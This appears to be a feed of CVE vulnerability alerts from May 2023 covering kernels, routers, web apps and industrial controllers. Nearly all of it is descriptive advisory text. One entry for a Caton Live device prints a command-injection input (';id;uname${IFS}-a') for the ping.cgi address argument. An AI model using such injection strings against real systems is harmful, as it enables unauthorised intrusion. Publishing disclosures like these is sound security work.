🚨 CVE-2023-1979The Web Stories for WordPress plugin supports the WordPress built-in functionality of protecting content with a password. The content is then only accessible to website visitors after entering the password. In WordPress, users with the "Author" role can create stories, but don't have the ability to edit password protected stories. The vulnerability allowed users with said role to bypass this permission check when trying to duplicate the protected story in the plugin's own dashboard, giving them access to the seemingly protected content. We recommend upgrading to version 1.32 or beyond commit ad49781c2a35c5c92ef704d4b621ab4e5cb77d68 https://github.com/GoogleForCreators/web-stories-wp/commit/ad49781c2a35c5c92ef704d4b621ab4e5cb77d68 🎖@cveNotify |
|
| 2023-05-12 20:58:25 |
🚨 CVE-2023-0948The Japanized For WooCommerce WordPress plugin before 2.5.8 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting🎖@cveNotify |
|
| 2023-05-12 20:58:24 |
🚨 CVE-2023-22784There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-05-12 20:58:23 |
🚨 CVE-2023-22785There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-05-12 20:58:21 |
🚨 CVE-2023-22786There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-05-12 20:58:20 |
🚨 CVE-2022-40504Transient DOS due to reachable assertion in Modem when UE received Downlink Data Indication message from the network.🎖@cveNotify |
|
| 2023-05-12 20:58:19 |
🚨 CVE-2023-21666Memory Corruption in Graphics while accessing a buffer allocated through the graphics pool.🎖@cveNotify |
|
| 2023-05-12 20:58:18 |
🚨 CVE-2023-25927IBM Security Verify Access 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, and 10.0.5 could allow an attacker to crash the webseald process using specially crafted HTTP requests resulting in loss of access to the system. IBM X-Force ID: 247635.🎖@cveNotify |
|
| 2023-05-12 20:58:17 |
🚨 CVE-2023-2457Out of bounds write in ChromeOS Audio Server in Google Chrome on ChromeOS prior to 113.0.5672.114 allowed a remote attacker to potentially exploit heap corruption via crafted audio file. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-12 18:58:21 |
🚨 CVE-2022-47334In phasecheck server, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-12 18:58:17 |
🚨 CVE-2022-48384In srtd service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-12 18:58:16 |
🚨 CVE-2022-47492In soter service, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-12 18:58:15 |
🚨 CVE-2022-47493In soter service, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-12 17:58:30 |
🚨 CVE-2023-29242Improper access control for Intel(R) oneAPI Toolkits before version 2021.1 Beta 10 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-12 17:58:29 |
🚨 CVE-2023-30763Heap-based overflow in Intel(R) SoC Watch based software before version 2021.1 may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-12 17:58:25 |
🚨 CVE-2023-31199Improper access control in the Intel(R) Solid State Drive Toolbox(TM) before version 3.4.5 may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-12 17:58:24 |
🚨 CVE-2023-2573Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.🎖@cveNotify |
|
| 2023-05-12 17:58:20 |
🚨 CVE-2023-2574Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the device name input field, which can be triggered by authenticated users via a crafted POST request.🎖@cveNotify |
|
| 2023-05-12 17:58:19 |
🚨 CVE-2022-48377In dialer service, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-12 17:58:18 |
🚨 CVE-2023-21665Memory corruption in Graphics while importing a file.🎖@cveNotify |
|
| 2023-05-12 17:58:14 |
🚨 CVE-2023-32290The myMail app through 14.30 for iOS sends cleartext credentials in a situation where STARTTLS is expected by a server.🎖@cveNotify |
|
| 2023-05-12 17:58:13 |
🚨 CVE-2023-31806Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via a crafted payload to the My Progress function.🎖@cveNotify |
|
| 2023-05-12 15:58:54 |
🚨 CVE-2022-4696There exists a use-after-free vulnerability in the Linux kernel through io_uring and the IORING_OP_SPLICE operation. If IORING_OP_SPLICE is missing the IO_WQ_WORK_FILES flag, which signals that the operation won't use current->nsproxy, so its reference counter is not increased. This assumption is not always true as calling io_splice on specific files will call the get_uts function which will use current->nsproxy leading to invalidly decreasing its reference counter later causing the use-after-free vulnerability. We recommend upgrading to version 5.10.160 or above🎖@cveNotify |
|
| 2023-05-12 15:58:53 |
🚨 CVE-2022-35256The llhttp parser in the http module in Node v18.7.0 does not correctly handle header fields that are not terminated with CLRF. This may result in HTTP Request Smuggling.🎖@cveNotify |
|
| 2023-05-12 15:58:52 |
🚨 CVE-2022-3545A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-12 15:58:48 |
🚨 CVE-2022-24122kernel/ucount.c in the Linux kernel 5.14 through 5.16.4, when unprivileged user namespaces are enabled, allows a use-after-free and privilege escalation because a ucounts object can outlive its namespace.🎖@cveNotify |
|
| 2023-05-12 15:58:47 |
🚨 CVE-2023-2682A vulnerability was found in Caton Live up to 2023-04-26 and classified as critical. This issue affects some unknown processing of the file /cgi-bin/ping.cgi of the component Mini_HTTPD. The manipulation of the argument address with the input ;id;uname${IFS}-a leads to command injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-228911. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-12 15:58:46 |
🚨 CVE-2023-25309Cross Site Scripting (XSS) Vulnerability in Fetlife rollout-ui version 0.5, allows attackers to execute arbitrary code via a crafted url to the delete a feature functionality.🎖@cveNotify |
|
| 2023-05-12 15:58:45 |
🚨 CVE-2022-0492A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.🎖@cveNotify |
|
| 2023-05-12 15:58:42 |
🚨 CVE-2021-42008The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access.🎖@cveNotify |
|
| 2023-05-12 15:58:41 |
🚨 CVE-2013-0169The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.🎖@cveNotify |
|
| 2023-05-12 15:58:40 |
🚨 CVE-2023-31985A Command Injection vulnerability in Edimax Wireless Router N300 Firmware BR-6428NS_v4 allows attacker to execute arbitrary code via the formAccept function in /bin/webs without any limitations.🎖@cveNotify |
|
| 2023-05-12 15:58:36 |
🚨 CVE-2023-27932This issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, watchOS 9.4, tvOS 16.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. Processing maliciously crafted web content may bypass Same Origin Policy🎖@cveNotify |
|
| 2023-05-12 15:58:35 |
🚨 CVE-2023-30024The MagicJack device, a VoIP solution for internet phone calls, contains a hidden NAND flash memory partition allowing unauthorized read/write access. Attackers can exploit this by replacing the original software with a malicious version, leading to ransomware deployment on the host computer. Affected devices have firmware versions prior to magicJack A921 USB Phone Jack Rev 3.0 V1.4.🎖@cveNotify |
|
| 2023-05-12 15:58:34 |
🚨 CVE-2022-0108Inappropriate implementation in Navigation in Google Chrome prior to 97.0.4692.71 allowed a remote attacker to leak cross-origin data via a crafted HTML page.🎖@cveNotify |
|
| 2023-05-12 14:58:12 |
🚨 CVE-2023-31807Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via a crafted payload to the personal notes function.🎖@cveNotify |
|
| 2023-05-12 00:58:37 |
🚨 CVE-2023-28357A vulnerability has been identified in Rocket.Chat, where the ACL checks in the Slash Command /mute occur after checking whether a user is a member of a given channel, leaking private channel members to unauthorized users. This allows authenticated users to enumerate whether a username is a member of a channel that they do not have access to.🎖@cveNotify |
|
| 2023-05-12 00:58:36 |
🚨 CVE-2023-28358A vulnerability has been discovered in Rocket.Chat where a markdown parsing issue in the "Search Messages" feature allows the insertion of malicious tags. This can be exploited on servers with content security policy disabled possible leading to some issues attacks like account takeover.🎖@cveNotify |
|
| 2023-05-12 00:58:33 |
🚨 CVE-2023-28359A NoSQL injection vulnerability has been identified in the listEmojiCustom method call within Rocket.Chat. This can be exploited by unauthenticated users when there is at least one custom emoji uploaded to the Rocket.Chat instance. The vulnerability causes a delay in the server response, with the potential for limited impact.🎖@cveNotify |
|
| 2023-05-12 00:58:32 |
🚨 CVE-2023-28361A Cross-site WebSocket Hijacking (CSWSH) vulnerability found in UniFi OS 2.5 and earlier allows a malicious actor to access certain confidential information by persuading a UniFi OS user to visit a malicious webpage.Affected Products:Cloud Key Gen2Cloud Key Gen2 PlusUNVRUNVR ProfessionalUDMUDM ProfessionalUDM SEUDRMitigation:Update affected products to UniFi OS 3.0.13 or later.🎖@cveNotify |
|
| 2023-05-12 00:58:31 |
🚨 CVE-2023-29274Adobe Substance 3D Painter versions 8.3.0 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-05-12 00:58:27 |
🚨 CVE-2023-29277Adobe Substance 3D Painter versions 8.3.0 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-05-12 00:58:26 |
🚨 CVE-2023-29279Adobe Substance 3D Painter versions 8.3.0 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-05-12 00:58:22 |
🚨 CVE-2023-29281Adobe Substance 3D Painter versions 8.3.0 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-05-12 00:58:21 |
🚨 CVE-2023-29284Adobe Substance 3D Painter versions 8.3.0 (and earlier) is affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-05-11 22:58:31 |
🚨 CVE-2023-27936An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, iOS 15.7.4 and iPadOS 15.7.4, macOS Big Sur 11.7.5. An app may be able to cause unexpected system termination or write kernel memory🎖@cveNotify |
|
| 2023-05-11 22:58:30 |
🚨 CVE-2023-27941A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Ventura 13.3, iOS 15.7.4 and iPadOS 15.7.4. An app may be able to disclose kernel memory🎖@cveNotify |
|
| 2023-05-11 22:58:26 |
🚨 CVE-2023-27935The issue was addressed with improved bounds checks. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, macOS Big Sur 11.7.5. A remote user may be able to cause unexpected app termination or arbitrary code execution🎖@cveNotify |
|
| 2023-05-11 22:58:25 |
🚨 CVE-2022-48239In camera driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-11 22:58:20 |
🚨 CVE-2022-48374In tee service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-11 22:58:19 |
🚨 CVE-2023-27554IBM WebSphere Application Server 8.5 and 9.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 249185.🎖@cveNotify |
|
| 2023-05-11 22:58:14 |
🚨 CVE-2023-29195Vitess is a database clustering system for horizontal scaling of MySQL through generalized sharding. Prior to version 16.0.2, users can either intentionally or inadvertently create a shard containing `/` characters from VTAdmin such that from that point on, anyone who tries to create a new shard from VTAdmin will receive an error. Attempting to view the keyspace(s) will also no longer work. Creating a shard using `vtctldclient` does not have the same problem because the CLI validates the input correctly. Version 16.0.2, corresponding to version 0.16.2 of the `go` module, contains a patch for this issue. Some workarounds are available. Always use `vtctldclient` to create shards, instead of using VTAdmin; disable creating shards from VTAdmin using RBAC; and/or delete the topology record for the offending shard using the client for your topology server.🎖@cveNotify |
|
| 2023-05-11 22:58:13 |
🚨 CVE-2022-48236In MP3 encoder, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-11 21:58:14 |
🚨 CVE-2022-43877IBM UrbanCode Deploy (UCD) versions up to 7.3.0.1 could disclose sensitive password information during a manual edit of the agentrelay.properties file. IBM X-Force ID: 240148.🎖@cveNotify |
|
| 2023-05-11 21:58:13 |
🚨 CVE-2023-29939llvm-project commit a0138390 was discovered to contain a segmentation fault via the component mlir::spirv::TargetEnv::TargetEnv(mlir::spirv::TargetEnvAttr).🎖@cveNotify |
|
| 2023-05-11 21:58:12 |
🚨 CVE-2023-29935llvm-project commit a0138390 was discovered to contain an assertion failure at !replacements.count(op) && "operation was already replaced.🎖@cveNotify |
|
| 2023-05-11 18:58:20 |
🚨 CVE-2023-29400Templates containing actions in unquoted HTML attributes (e.g. "attr={{.}}") executed with empty input can result in output with unexpected results when parsed due to HTML normalization rules. This may allow injection of arbitrary attributes into tags.🎖@cveNotify |
|
| 2023-05-11 18:58:19 |
🚨 CVE-2023-30093A cross-site scripting (XSS) vulnerability in Open Networking Foundation ONOS from version v1.9.0 to v2.7.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the url parameter of the API documentation dashboard.🎖@cveNotify |
|
| 2023-05-11 18:58:15 |
🚨 CVE-2023-30095A stored cross-site scripting (XSS) vulnerability in TotalJS messenger commit b6cf1c9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the channel description field.🎖@cveNotify |
|
| 2023-05-11 18:58:14 |
🚨 CVE-2023-30096A stored cross-site scripting (XSS) vulnerability in TotalJS messenger commit b6cf1c9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user information field.🎖@cveNotify |
|
| 2023-05-11 18:58:13 |
🚨 CVE-2023-24788NotrinosERP v0.7 was discovered to contain a SQL injection vulnerability via the OrderNumber parameter at /NotrinosERP/sales/customer_delivery.php.🎖@cveNotify |
|
| 2023-05-11 16:58:23 |
🚨 CVE-2023-30624Wasmtime is a standalone runtime for WebAssembly. Prior to versions 6.0.2, 7.0.1, and 8.0.1, Wasmtime's implementation of managing per-instance state, such as tables and memories, contains LLVM-level undefined behavior. This undefined behavior was found to cause runtime-level issues when compiled with LLVM 16 which causes some writes, which are critical for correctness, to be optimized away. Vulnerable versions of Wasmtime compiled with Rust 1.70, which is currently in beta, or later are known to have incorrectly compiled functions. Versions of Wasmtime compiled with the current Rust stable release, 1.69, and prior are not known at this time to have any issues, but can theoretically exhibit potential issues.The underlying problem is that Wasmtime's runtime state for an instance involves a Rust-defined structure called `Instance` which has a trailing `VMContext` structure after it. This `VMContext` structure has a runtime-defined layout that is unique per-module. This representation cannot be expressed with safe code in Rust so `unsafe` code is required to maintain this state. The code doing this, however, has methods which take `&self` as an argument but modify data in the `VMContext` part of the allocation. This means that pointers derived from `&self` are mutated. This is typically not allowed, except in the presence of `UnsafeCell`, in Rust. When compiled to LLVM these functions have `noalias readonly` parameters which means it's UB to write through the pointers.Wasmtime's internal representation and management of `VMContext` has been updated to use `&mut self` methods where appropriate. Additionally verification tools for `unsafe` code in Rust, such as `cargo miri`, are planned to be executed on the `main` branch soon to fix any Rust-level issues that may be exploited in future compiler versions.Precomplied binaries available for Wasmtime from GitHub releases have been compiled with at most LLVM 15 so are not known to be vulnerable. As mentioned above, however, it's still recommended to update.Wasmtime version 6.0.2, 7.0.1, and 8.0.1 have been issued which contain the patch necessary to work correctly on LLVM 16 and have no known UB on LLVM 15 and earlier. If Wasmtime is compiled with Rust 1.69 and prior, which use LLVM 15, then there are no known issues. There is a theoretical possibility for undefined behavior to exploited, however, so it's recommended that users upgrade to a patched version of Wasmtime. Users using beta Rust (1.70 at this time) or nightly Rust (1.71 at this time) must update to a patched version to work correctly.🎖@cveNotify |
|
| 2023-05-11 16:58:22 |
🚨 CVE-2023-22874IBM MQ Clients 9.2 CD, 9.3 CD, and 9.3 LTS are vulnerable to a denial of service attack when processing configuration files. IBM X-Force ID: 244216.🎖@cveNotify |
|
| 2023-05-11 16:58:21 |
🚨 CVE-2022-43919IBM MQ 9.2 CD, 9.2 LTS, 9.3 CD, and 9.3 LTS could allow an authenticated attacker with authorization to craft messages to cause a denial of service. IBM X-Force ID: 241354.🎖@cveNotify |
|
| 2023-05-11 11:58:33 |
🚨 CVE-2023-23535The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, watchOS 9.4, tvOS 16.4, iOS 15.7.4 and iPadOS 15.7.4, iOS 16.4 and iPadOS 16.4. Processing a maliciously crafted image may result in disclosure of process memory🎖@cveNotify |
|
| 2023-05-11 11:58:32 |
🚨 CVE-2023-23537A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, watchOS 9.4, iOS 15.7.4 and iPadOS 15.7.4, iOS 16.4 and iPadOS 16.4. An app may be able to read sensitive location information🎖@cveNotify |
|
| 2023-05-11 11:58:31 |
🚨 CVE-2023-23523A logic issue was addressed with improved restrictions. This issue is fixed in macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4. Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup🎖@cveNotify |
|
| 2023-05-11 11:58:30 |
🚨 CVE-2023-23527The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, macOS Monterey 12.6.4, watchOS 9.4, tvOS 16.4, iOS 16.4 and iPadOS 16.4. A user may gain access to protected parts of the file system🎖@cveNotify |
|
| 2023-05-11 11:58:27 |
🚨 CVE-2022-48248In audio service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-11 11:58:26 |
🚨 CVE-2023-23534The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5. Processing a maliciously crafted image may result in disclosure of process memory🎖@cveNotify |
|
| 2023-05-11 11:58:25 |
🚨 CVE-2022-48369In audio service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-11 11:58:21 |
🚨 CVE-2022-48242In telephony service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-11 11:58:20 |
🚨 CVE-2022-48245In audio service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-11 11:58:16 |
🚨 CVE-2022-48368In audio service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-11 11:58:15 |
🚨 CVE-2022-48234In FM service , there is a possible missing params check. This could lead to local denial of service in FM service .🎖@cveNotify |
|
| 2023-05-11 05:58:28 |
🚨 CVE-2023-30943The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system.🎖@cveNotify |
|
| 2023-05-11 05:58:24 |
🚨 CVE-2023-30944The vulnerability was found Moodle which exists due to insufficient sanitization of user-supplied data in external Wiki method for listing pages. A remote attacker can send a specially crafted request to the affected application and execute limited SQL commands within the application database.🎖@cveNotify |
|
| 2023-05-11 05:58:23 |
🚨 CVE-2023-31442In Lightbend Akka before 2.8.1, the async-dns resolver (used by Discovery in DNS mode and transitively by Cluster Bootstrap) uses predictable DNS transaction IDs when resolving DNS records, making DNS resolution subject to poisoning by an attacker. If the application performing discovery does not validate (e.g., via TLS) the authenticity of the discovered service, this may result in exfiltration of application data (e.g., persistence events may be published to an unintended Kafka broker). If such validation is performed, then the poisoning constitutes a denial of access to the intended service. This affects Akka 2.5.14 through 2.8.0, and Akka Discovery through 2.8.0.🎖@cveNotify |
|
| 2023-05-11 05:58:22 |
🚨 CVE-2023-31477A path traversal issue was discovered on GL.iNet devices before 3.216. Through the file sharing feature, it is possible to share an arbitrary directory, such as /tmp or /etc, because there is no server-side restriction to limit sharing to the USB path.🎖@cveNotify |
|
| 2023-05-11 05:58:18 |
🚨 CVE-2023-21499Out-of-bounds write vulnerability in TA_Communication_mpos_encrypt_pin in mPOS TUI trustlet prior to SMR May-2023 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-05-11 05:58:17 |
🚨 CVE-2023-21508Out-of-bounds Write vulnerability while processing BC_TUI_CMD_SEND_RESOURCE_DATA command in bc_tui trustlet from Samsung Blockchain Keystore prior to version 1.3.12.1 allows local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-05-11 05:58:13 |
🚨 CVE-2023-21509Out-of-bounds Write vulnerability while processing BC_TUI_CMD_UPDATE_SCREEN in bc_tui trustlet from Samsung Blockchain Keystore prior to version 1.3.12.1 allows local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-05-11 05:58:12 |
🚨 CVE-2023-30095A stored cross-site scripting (XSS) vulnerability in TotalJS messenger commit b6cf1c9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the channel description field.🎖@cveNotify |
|
| 2023-05-11 00:58:16 |
🚨 CVE-2022-29840Server-Side Request Forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL to point back to the loopback adapter was addressed in Western Digital My Cloud OS 5 devices. This could allow the URL to exploit other vulnerabilities on the local server.This issue affects My Cloud OS 5 devices before 5.26.202.🎖@cveNotify |
|
| 2023-05-11 00:58:15 |
🚨 CVE-2022-36329An improper privilege management issue that could allow an attacker to cause a denial of service over the OTA mechanism was discovered in Western Digital My Cloud Home, My Cloud Home Duo and SanDisk ibi devices.This issue affects My Cloud Home and My Cloud Home Duo: before 9.4.0-191; ibi: before 9.4.0-191.🎖@cveNotify |
|
| 2023-05-11 00:58:14 |
🚨 CVE-2022-36330A buffer overflow vulnerability was discovered on firmware version validation that could lead to an unauthenticated remote code execution in Western Digital My Cloud Home, My Cloud Home Duo and SanDisk ibi devices. An attacker would require exploitation of another vulnerability to raise their privileges in order to exploit this buffer overflow vulnerability.This issue affects My Cloud Home and My Cloud Home Duo: before 9.4.0-191; ibi: before 9.4.0-191. 🎖@cveNotify |
|
| 2023-05-11 00:58:13 |
🚨 CVE-2022-29841Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that was caused by a command that read files from a privileged location and created a system command without sanitizing the read data. This command could be triggered by an attacker remotely to cause code execution and gain a reverse shell in Western Digital My Cloud OS 5 devices.This issue affects My Cloud OS 5: before 5.26.119.🎖@cveNotify |
|
| 2023-05-10 22:58:27 |
🚨 CVE-2023-31148An Improper Input Validation vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface could allow a remote authenticated attacker to execute arbitrary code.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-10 22:58:24 |
🚨 CVE-2023-31149An Improper Input Validation vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface could allow a remote authenticated attacker to execute arbitrary code.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-10 22:58:23 |
🚨 CVE-2023-31152An Authentication Bypass Using an Alternate Path or Channel vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface allows Authentication Bypass. See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-10 22:58:22 |
🚨 CVE-2023-31153An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface could allow a remote authenticated attacker to inject and execute arbitrary script code.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-10 22:58:18 |
🚨 CVE-2023-31156An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface could allow a remote authenticated attacker to inject and execute arbitrary script code.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-10 22:58:17 |
🚨 CVE-2023-31158An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface could allow a remote authenticated attacker to inject and execute arbitrary script code.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-10 22:58:13 |
🚨 CVE-2023-31160An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface could allow a remote authenticated attacker to inject and execute arbitrary script code.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-10 22:58:12 |
🚨 CVE-2023-31162An Improper Input Validation vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface could allow a remote authenticated attacker to arbitrarily alter the content of a configuration file.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-10 22:58:11 |
🚨 CVE-2023-31163An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface could allow a remote authenticated attacker to inject and execute arbitrary script code.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-10 20:58:34 |
🚨 CVE-2023-30097A stored cross-site scripting (XSS) vulnerability in TotalJS messenger commit b6cf1c9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the private task field.🎖@cveNotify |
|
| 2023-05-10 20:58:33 |
🚨 CVE-2023-23059An issue was discovered in GeoVision GV-Edge Recording Manager 2.2.3.0 for windows, which contains improper permissions within the default installation and allows attackers to execute arbitrary code and gain escalated privileges.🎖@cveNotify |
|
| 2023-05-10 20:58:32 |
🚨 CVE-2023-2524A vulnerability classified as critical has been found in Control iD RHiD 23.3.19.0. This affects an unknown part of the file /v2/#/. The manipulation leads to direct request. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-228015. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-10 20:58:28 |
🚨 CVE-2023-2523A vulnerability was found in Weaver E-Office 9.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file App/Ajax/ajax.php?action=mobile_upload_save. The manipulation of the argument upload_quwan leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-228014 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-10 20:58:27 |
🚨 CVE-2023-28724NGINX Management Suite default file permissions are set such that an authenticated attacker may be able to modify sensitive files on NGINX Instance Manager and NGINX API Connectivity Manager. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-10 20:58:26 |
🚨 CVE-2023-28742When DNS is provisioned, an authenticated remote command execution vulnerability exists in DNS iQuery mesh. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-10 20:58:23 |
🚨 CVE-2023-29868Zammad 5.3.x (Fixed in 5.4.0) is vulnerable to Incorrect Access Control. An authenticated attacker with agent and customer roles could perform unauthorized changes on articles where they only have customer permissions.🎖@cveNotify |
|
| 2023-05-10 20:58:22 |
